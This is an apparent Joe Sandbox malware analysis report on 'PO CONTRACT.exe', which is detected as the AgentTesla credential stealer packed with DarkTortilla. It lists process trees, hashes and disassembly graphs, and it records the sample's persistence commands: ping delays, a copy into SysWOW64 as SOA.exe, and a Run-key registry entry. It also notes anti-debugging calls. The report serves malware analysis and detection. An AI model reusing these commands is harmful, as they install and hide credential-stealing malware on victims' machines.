                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36000430187.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:23:10:04
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0xfb0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:23:10:04
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:23:10:04
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:ping 127.0.0.1 -n 36
                                        Imagebase:0x40000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:23:10:34
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0xfb0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:23:10:34
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:23:10:34
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:ping 127.0.0.1 -n 43
                                        Imagebase:0x40000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:23:10:39
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0x3a0000
                                        File size:59'392 bytes
                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:23:11:15
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:ping 127.0.0.1 -n 43
                                        Imagebase:0x40000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:23:11:56
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\SOA.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0xc80000
                                        File size:2'417'152 bytes
                                        MD5 hash:E9E7439B7D1098424BFC0BC877B7B2C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000A.00000002.37452537402.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 47%, ReversingLabs
                                        • Detection: 57%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:23:12:29
                                        Start date:14/08/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0xd00000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.40717853751.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:13
                                        Start time:23:13:14
                                        Start date:14/08/2024
                                        Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                        Imagebase:0x450000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        • Detection: 0%, Virustotal, Browse
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:23:13:14
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:23:13:22
                                        Start date:14/08/2024
                                        Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                        Imagebase:0x340000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:23:13:22
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:16%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:8.8%
                                          Total number of Nodes:68
                                          Total number of Limit Nodes:1
                                          execution_graph 62738 545df84 62739 545df92 62738->62739 62740 545df42 62738->62740 62744 545df70 62740->62744 62747 545df5f 62740->62747 62741 545df58 62745 545df81 62744->62745 62751 545f3a0 62744->62751 62745->62741 62748 545df70 62747->62748 62749 545df81 62748->62749 62750 545f3a0 2 API calls 62748->62750 62749->62741 62750->62749 62755 545f3c0 62751->62755 62759 545f3d0 62751->62759 62752 545f3ba 62752->62745 62756 545f412 62755->62756 62758 545f419 62755->62758 62757 545f46a CallWindowProcW 62756->62757 62756->62758 62757->62758 62758->62752 62760 545f412 62759->62760 62762 545f419 62759->62762 62761 545f46a CallWindowProcW 62760->62761 62760->62762 62761->62762 62762->62752 62773 5452ae0 62774 5452af2 62773->62774 62779 5453070 62774->62779 62782 545304a 62774->62782 62785 54531f0 62774->62785 62789 54531f8 62774->62789 62780 54530b4 CheckRemoteDebuggerPresent 62779->62780 62781 54530f6 62780->62781 62781->62774 62783 54530b4 CheckRemoteDebuggerPresent 62782->62783 62784 54530f6 62783->62784 62784->62774 62786 54531f8 OutputDebugStringW 62785->62786 62788 5453277 62786->62788 62788->62774 62790 545323e OutputDebugStringW 62789->62790 62792 5453277 62790->62792 62792->62774 62763 8ff7db8 62764 8ff7f43 62763->62764 62765 8ff7dde 62763->62765 62765->62764 62768 8ff8038 PostMessageW 62765->62768 62770 8ff8036 62765->62770 62769 8ff80a4 62768->62769 62769->62765 62771 8ff8038 PostMessageW 62770->62771 62772 8ff80a4 62771->62772 62772->62765 62793 97209d8 62794 9720a02 62793->62794 62798 9727a18 62794->62798 62803 9727a08 62794->62803 62795 9726173 62799 9727a41 62798->62799 62808 9727ce0 62799->62808 62812 9727c7d 62799->62812 62800 9727b24 62800->62795 62804 9727a41 62803->62804 62805 9727ce0 2 API calls 62804->62805 62806 9727c7d 2 API calls 62804->62806 62807 9727b24 62805->62807 62806->62807 62807->62795 62809 9727cf6 62808->62809 62816 97283e0 62809->62816 62813 9727c8e 62812->62813 62815 97283e0 2 API calls 62813->62815 62814 9727fca 62814->62800 62815->62814 62817 97283f5 62816->62817 62821 97286d8 62817->62821 62825 972869f 62817->62825 62818 9727fca 62818->62800 62822 972871e DeleteFileW 62821->62822 62824 9728757 62822->62824 62824->62818 62826 97286ac DeleteFileW 62825->62826 62828 9728757 62826->62828 62828->62818

                                          Executed Functions

                                          Function 08F50A94 Relevance: 5.6, Instructions: 5560COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 8f50a94-8f50d08 30 8f50d0e-8f51a35 0->30 31 8f52c7b-8f52f60 0->31 438 8f51d07-8f52c73 30->438 439 8f51a3b-8f51cff 30->439 106 8f53ec7-8f54ec0 31->106 107 8f52f66-8f53ebf 31->107 672 8f551b6-8f551c9 106->672 673 8f54ec6-8f551ae 106->673 107->106 438->31 439->438 677 8f55830-8f567a8 672->677 678 8f551cf-8f55828 672->678 673->672 1062 8f567a8 call 8f57c40 677->1062 1063 8f567a8 call 8f57c30 677->1063 1064 8f567a8 call 8f57bfb 677->1064 678->677 1061 8f567ae-8f567b5 1062->1061 1063->1061 1064->1061
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 575e67d32d79d35671d2c4f21dfea47bf532d23d99056d082110c182f157d773
                                          • Instruction ID: a1adb634abd6e3a389ecd61d84b35f53ad08ae134e4621ef2768f879a7492e2b
                                          • Opcode Fuzzy Hash: 575e67d32d79d35671d2c4f21dfea47bf532d23d99056d082110c182f157d773
                                          • Instruction Fuzzy Hash: A8B32971A012288FCB98FF79D9992ADBBF2FB89200F4085E9D448A7354DB345D95CF81
                                          Function 08F50AB8 Relevance: 5.5, Instructions: 5545COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1065 8f50ab8-8f50d08 1094 8f50d0e-8f51a35 1065->1094 1095 8f52c7b-8f52f60 1065->1095 1502 8f51d07-8f52c73 1094->1502 1503 8f51a3b-8f51cff 1094->1503 1170 8f53ec7-8f54ec0 1095->1170 1171 8f52f66-8f53ebf 1095->1171 1736 8f551b6-8f551c9 1170->1736 1737 8f54ec6-8f551ae 1170->1737 1171->1170 1502->1095 1503->1502 1741 8f55830-8f567a8 1736->1741 1742 8f551cf-8f55828 1736->1742 1737->1736 2126 8f567a8 call 8f57c40 1741->2126 2127 8f567a8 call 8f57c30 1741->2127 2128 8f567a8 call 8f57bfb 1741->2128 1742->1741 2125 8f567ae-8f567b5 2126->2125 2127->2125 2128->2125
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6430cdc80ba289746669f78e7bfc3a1f98294490b8af6738aa29b31d873161de
                                          • Instruction ID: 93a5b08429b21d4ee0e84e0ee5fae35a4e1089e9d9ee36c919f8fb16857ae796
                                          • Opcode Fuzzy Hash: 6430cdc80ba289746669f78e7bfc3a1f98294490b8af6738aa29b31d873161de
                                          • Instruction Fuzzy Hash: 9CB31971A112288FCB98FF79D9992ADBBF2FB88200F4085E9D448A7354DB345D95CF81
                                          Function 097209D8 Relevance: 5.2, Instructions: 5226COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3083 97209d8-9720bf3 4034 9720bf5 call 972725b 3083->4034 4035 9720bf5 call 9727268 3083->4035 3108 9720bfb-972616b 4032 972616d call 9727a18 3108->4032 4033 972616d call 9727a08 3108->4033 4031 9726173-972617a 4032->4031 4033->4031 4034->3108 4035->3108
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0c69173e52923f3cedf55411ec20836a614eb10c296ebded8a905c2aa4c5cc4
                                          • Instruction ID: e79e847f4d4db1010636570b73dbb2ff92ea4b0f79c24be00537959adefde8a5
                                          • Opcode Fuzzy Hash: c0c69173e52923f3cedf55411ec20836a614eb10c296ebded8a905c2aa4c5cc4
                                          • Instruction Fuzzy Hash: 33B3FA71A112198FCB58BF79E99966DBBF2FB84300F4085EAD488A3250DF345E95CF81
                                          Function 05453EA0 Relevance: 3.9, Instructions: 3882COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4036 5453ea0-5457635 4614 5457645-54576e9 4036->4614 4615 5457637-5457640 call 5453cc0 4036->4615 4625 54576ef-545770e 4614->4625 4626 545788a-5457942 4614->4626 4615->4614 4630 5457714-54577c3 4625->4630 4631 54577ca-5457884 4625->4631 4651 5457e9e-545801b 4626->4651 4652 5457948-5457a25 4626->4652 4630->4631 4631->4625 4631->4626 4651->4614 4675 5457db2-5457e98 4652->4675 4676 5457a2b-5457b08 call 5453cd0 4652->4676 4675->4651 4675->4652 4712 5457b77-5457c14 4676->4712 4713 5457b0a-5457b2b 4676->4713 4732 5457c17-5457c19 4712->4732 4713->4712 4722 5457b2d-5457b4e call 5453cd0 4713->4722 4722->4712 4731 5457b50-5457b5d 4722->4731 4737 5457b64-5457b71 4731->4737 4734 5457d03-5457dac 4732->4734 4735 5457c1f-5457c2a call 5453cc0 4732->4735 4734->4675 4734->4676 4735->4734 4737->4712 4737->4732
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b27462ff6578cfee4b686880d0578621ae61e4c77e6b5e57ab3b91c86e02a0e0
                                          • Instruction ID: 2e7435ac21494f8701ac4b47b651fcd67f6d0f15bbdab2e4536970e1f16cd80e
                                          • Opcode Fuzzy Hash: b27462ff6578cfee4b686880d0578621ae61e4c77e6b5e57ab3b91c86e02a0e0
                                          • Instruction Fuzzy Hash: 5B733A70A15628CBCB58EFB8EC897ADBBB5FB48200F5085E9E448A3244DF346D94CF55
                                          Function 08FF4066 Relevance: 3.0, Instructions: 3039COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4747 8ff4066-8ff4072 4748 8ff4073-8ff407c 4747->4748 4749 8ff437e-8ff43d4 4748->4749 4750 8ff407d-8ff4099 4748->4750 4753 8ff43d6-8ff43e2 call 8ff449b 4749->4753 4754 8ff4402-8ff4414 4749->4754 4755 8ff409f 4750->4755 4756 8ff426d-8ff4340 4750->4756 4763 8ff43e4-8ff43ed 4753->4763 4758 8ff4417-8ff441d 4754->4758 4759 8ff40a6-8ff4250 4755->4759 4812 8ff4379 4756->4812 4813 8ff4342-8ff4353 4756->4813 4764 8ff441e-8ff4428 4758->4764 4759->4756 4845 8ff4252-8ff425a 4759->4845 4763->4763 4766 8ff43ef-8ff43ff 4763->4766 4767 8ff442a-8ff442c 4764->4767 4766->4754 4769 8ff445e-8ff446c 4767->4769 4770 8ff442e-8ff443b 4767->4770 4771 8ff446d-8ff447e 4769->4771 4773 8ff443d 4770->4773 4774 8ff4480-8ff457d 4770->4774 4771->4774 4773->4767 4776 8ff443f-8ff4454 4773->4776 4808 8ff457f-8ff458a 4774->4808 4809 8ff4591-8ff4926 4774->4809 4776->4771 4777 8ff4456-8ff445c 4776->4777 4777->4769 4808->4809 4883 8ff492c-8ff6d7b 4809->4883 4884 8ff76d7-8ff76dc 4809->4884 4812->4749 4813->4748 4816 8ff4359-8ff436a call 8ff6d7c 4813->4816 4826 8ff4371-8ff4378 4816->4826 4845->4756 4883->4884 4887 8ff76dd-8ff76e9 4884->4887 4887->4887 4889 8ff76eb-8ff770e 4887->4889 4890 8ff7750-8ff777e 4889->4890 4891 8ff7710-8ff773b 4889->4891 4893 8ff77c0-8ff77d2 4890->4893 4894 8ff7780-8ff779e 4890->4894 4891->4890 4895 8ff77e0-8ff7805 4893->4895 4894->4895 4898 8ff77a0-8ff77b2 4894->4898 4900 8ff77b4-8ff77bd 4898->4900 4900->4900 4901 8ff77bf 4900->4901 4901->4893
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08a517fd6965ad8a5dd9c8685cfa987d5c575e6060afdf7106b94c8ec8a1b5cc
                                          • Instruction ID: be91bda77d159e431d29c8f6ba4077fee99fa70f2295d82377dc205ec842642a
                                          • Opcode Fuzzy Hash: 08a517fd6965ad8a5dd9c8685cfa987d5c575e6060afdf7106b94c8ec8a1b5cc
                                          • Instruction Fuzzy Hash: FA438CB0A15218CBCB54FFB8D9886ADBBB1EF88300F4185E9D548A3351DF385D94CBA5
                                          Function 02D6C8D8 Relevance: 2.2, Instructions: 2219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b929124243ecedeb6a66a4db3ccd248f66f23f52dd348d577d2630c90222132a
                                          • Instruction ID: 977898547f2e97f431af0b4a4a01d4be25f88b966df85cf47e7154f77db30823
                                          • Opcode Fuzzy Hash: b929124243ecedeb6a66a4db3ccd248f66f23f52dd348d577d2630c90222132a
                                          • Instruction Fuzzy Hash: 54130974A18226DBCB54DFF8D884BADB3B5BB48304F508A95D90DE3344DB38AE90CB55
                                          Function 05453070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5980 5453070-54530f4 CheckRemoteDebuggerPresent 5982 54530f6-54530fc 5980->5982 5983 54530fd-5453138 5980->5983 5982->5983
                                          APIs
                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 054530E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: CheckDebuggerPresentRemote
                                          • String ID:
                                          • API String ID: 3662101638-0
                                          • Opcode ID: 0de3bacf0260c71f4cf1eb44fe5a4a24ebd1d0c5279cac086905e592d94d4de2
                                          • Instruction ID: 931877e44a079c98e4405059011cd0ab35a3461ecfb1029bf1ae5dda2a2ce53c
                                          • Opcode Fuzzy Hash: 0de3bacf0260c71f4cf1eb44fe5a4a24ebd1d0c5279cac086905e592d94d4de2
                                          • Instruction Fuzzy Hash: 782114B18002598FCB10CF9AD884BEEFBF4AF49320F14845AE859B3351D778A944CFA1
                                          Function 02D64420 Relevance: 1.0, Instructions: 984COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72b99dfdeed79dd491637c7b4616846e84ba21f54262349b3abf288f4343b5a3
                                          • Instruction ID: ec46704b3b41653a43262f58645fa7eb09760548ce8755c2cc6ba5ec90b786b6
                                          • Opcode Fuzzy Hash: 72b99dfdeed79dd491637c7b4616846e84ba21f54262349b3abf288f4343b5a3
                                          • Instruction Fuzzy Hash: 69923834A00249DFCB25CF68D588AAEBBF2FF89314F158559E8469B3A5D730ED41CB60
                                          Function 02D637E0 Relevance: .9, Instructions: 916COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f63283c26da3c5284f596aa32cd24abb1cfa00e0d1e6169b37c40a1f359e0007
                                          • Instruction ID: 1fa7b1fd897eb3009e06997021972609b0addfdef22567c24becdfd808182be5
                                          • Opcode Fuzzy Hash: f63283c26da3c5284f596aa32cd24abb1cfa00e0d1e6169b37c40a1f359e0007
                                          • Instruction Fuzzy Hash: 8B727370A002198FDB24DFA9D848AAEBBF2FF89704F148559E845EB3A5DB34DC45CB50
                                          Function 09728058 Relevance: .3, Instructions: 260COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bc712e23d40772859c9e2dc7ed3112e37649438a4503b6aa5db2c64e59f469b
                                          • Instruction ID: 16d86aa878dd30f74e1fa58390d99bf44f04ae7dbcfa623ffa2d782254603144
                                          • Opcode Fuzzy Hash: 9bc712e23d40772859c9e2dc7ed3112e37649438a4503b6aa5db2c64e59f469b
                                          • Instruction Fuzzy Hash: FA818135F102299BCF1CAB79945467E7BA7BFC8700B15852DE452E7389CE359C018BA2
                                          Function 0545F3D0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5948 545f3d0-545f40c 5949 545f412-545f417 5948->5949 5950 545f4bc-545f4dc 5948->5950 5951 545f419-545f450 5949->5951 5952 545f46a-545f4a2 CallWindowProcW 5949->5952 5957 545f4df-545f4ec 5950->5957 5959 545f452-545f458 5951->5959 5960 545f459-545f468 5951->5960 5953 545f4a4-545f4aa 5952->5953 5954 545f4ab-545f4ba 5952->5954 5953->5954 5954->5957 5959->5960 5960->5957
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0545F491
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: 41320796da0c8b10a9acf09f9783ba6375a56e9a628b1f6e22ccd3f99a47e2ba
                                          • Instruction ID: 3cab864ffa73dba59fa49c1f95ae8a69ebcb3095b0562e2c508ea22aa0afff52
                                          • Opcode Fuzzy Hash: 41320796da0c8b10a9acf09f9783ba6375a56e9a628b1f6e22ccd3f99a47e2ba
                                          • Instruction Fuzzy Hash: 0F414CB4900309DFCB14CF99C488AAABBF5FF89324F24C499D519A7322D774A845DFA1
                                          Function 0972869F Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
